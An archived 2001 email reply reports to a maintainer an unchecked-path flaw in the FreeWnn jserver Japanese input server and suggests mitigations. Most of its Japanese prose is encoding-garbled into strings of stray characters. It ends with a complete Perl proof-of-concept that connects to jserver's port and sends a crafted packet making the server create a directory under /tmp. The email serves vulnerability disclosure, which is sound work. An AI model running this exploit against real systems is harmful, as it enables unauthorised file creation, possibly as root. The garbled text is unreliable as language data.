- To: hiroo@oikumene.gcd.org
- Subject: Re: security bug report
- From: yusuke@kmc.kyoto-u.ac.jp (TABATA yusuke)
- Date: Tue, 14 Aug 2001 21:44:48 +0900 (JST)
- Cc: yusuke@kmc.kyoto-u.ac.jp
- Delivered-To: hiroo@oikumene.gcd.org
- In-Reply-To: Your message of "Tue, 14 Aug 2001 21:06:53 +0900".<20010814210653L.hiroo@oikumene.gcd.org>
$BEDH*$G$9(B
$B%a%$%j%s%0%j%9%H$K$O;22C$7$F$$$J$$$N$G(B
$B>.Ln$5$s$N$_$X$N%j%W%i%$$H$J$j$^$9!#E>Aw$J$I$O8f<+M3$K$I$&$>!#(B
<20010814210653L.hiroo@oikumene.gcd.org>$B$N5-;v$K$*$$$F(B
hiroo@oikumene.gcd.org$B$5$s$O=q$-$^$7$?!#(B
>> $BEDH*$5$s$,%A%'%C%/$5$l$?(B FreeWnn $B$N%P!<%8%g%s$H!"%=!<%9%3!<%I$N3:Ev$9(B
>> $B$k2U=j$r65$($FD:$1$J$$$G$7$g$&$+!#(B
FreeWnn-1.1.1-a17$B$G$9!#(B
exploit$B%W%m%0%i%`$N40A4HG$O:G8e$KIU$1$^$9(B($B<c43>iD9$J%=!<%9$G$9$,(B)
jserver/de.c $B$N(Bdemon_main.c() $B$G%Q%1%C%H$r<u$1$H$j(B
jserver/dispatch.c $B$N(B do_command() $BCf$N(Bswitch$BJ8$G(B
js_mkdir()$B$d(B js_dic_file_create()$B$r7P$F<B:]$N%U%!%$%kA`:n$X;j$k$^$G$N(B
$B%Q%9$G%A%'%C%/$,9T$J$o$l$F$$$J$$$H$$$&$3$H$,LdBj$N$h$&$G$9!#(B
$BB>$K$b$"$k$H;W$$$^$9$N$G%A%'%C%/$r$*4j$$$7$^$9!#(B
>> $B$3$l$+$iD4::$9$k$H$3$m$G$9$,!"Js9p$7$FD:$$$?FbMF$+$i$9$k$H!"(BWnn $B$N%W%m(B
>> $B%H%3%k$N@5Ev$JMW5a$N$h$&$J$N$G(B ($BKR2NE*$J;~Be$K:n$i$l$?$b$N$H$$$&$3$H$J(B
>> $B$N$G$7$g$&$,(B)$B!"$h$/9M$($FJQ99$r2C$($kI,MW$,$"$k$H;W$C$F$$$^$9!#(B
>> (cf. [freewnn:00683])
>> $BBP:v$K$D$$$FDs0F$,$"$l$P4?7^CW$7$^$9!#(B
$BBP:v$H$7$F$O(B
*root$B$G5/F0$7$?:]$K$O(BTCP$B$K$h$k@\B3$O<u$1$J$$(B
*root$B$GF0$+$7$F$O$$$1$J$$$3$H$rL@5-$9$k(B/root$B$G$OF0$+$J$$$h$&$K$9$k(B
*$B<-=q$N%G%#%l%/%H%j$N30$K$O%U%!%$%kA`:n$r$G$-$J$$$h$&$K$9$k(B
*$BFCDj$NL>A0$N%Q%?!<%s$r;}$C$?%U%!%$%k0J30$OA`:n$G$-$J$$$h$&$K$9$k(B
*Wnn6$B$HF1$8(Bwnnhosts$B$r:NMQ$9$k!"$?$@$7$3$N%"%/%;%9%3%s%H%m!<%k$O@\B3;~$K9T$&(B
$B$J$I$,;W$$$D$-$^$9!#(B
>> $B;CDj:v(B (workaround)$B!"915W:v(B (solution) $B$,Dj$^$j<!BhJs9p$7$?$$$H9M$($F(B
>> $B$$$^$9$,!"$=$&$$$&$o$1$G!":#$9$0$O<($;$^$;$s!#(B
solution$B$r9M$($k:]$K$O(B
*$B<-=q%U%!%$%k$N%W%i%$%P%7!<(B
*$BG'>Z(B
*$BDL?.$N0E9f2=(B
$B$J$I$b8!F$$r$*4j$$$7$^$9!#(B
$B0J2<$O>iD9$G$9$,!"LdBj$r0z$-5/$3$9%W%m%0%i%`$G$9(B
#! /usr/bin/perl
($them,$port) = @ARGV;
$port = 22273 unless $port;
$them = 'localhost' unless $them;
$SIG{'INT'} = 'dokill';
sub dokill { kill 9,$child if $child; }
use Socket;
$sockaddr = 'S n a4 x8';
chop($hostname = `hostname`);
($name, $aliases, $proto) = getprotobyname('tcp');
($name, $aliases, $port) = getservbyname($port, 'tcp')
unless $port =~ /^\d+$/;
($name, $aliases, $type, $len, $thisaddr) =
gethostbyname($hostname);
($name, $aliases, $type, $len, $thataddr) = gethostbyname($them);
$this = pack($sockaddr, &AF_INET, 0, $thisaddr);
$that = pack($sockaddr, &AF_INET, $port, $thataddr);
socket(S, &PF_INET, &SOCK_STREAM, $proto) || die "socket: $!";
# bind(S, $this) || die "bind: $!";
connect(S, $that) || die "connect: $!";
select(S); $| = 1; select(STDOUT);
print "connected!";
if ($child = fork) {
print STDOUT "send";
print S "\x00\x00\x00\x66\x00\x00\x00\x00".
"/tmp/hoge\x00".
"\x00\x00\x00\x00\x00\x00\x00\x03";
print STDOUT ".done.\n";
sleep 3;
do dokill();
}
else {
while (<S>) {
print;
}
}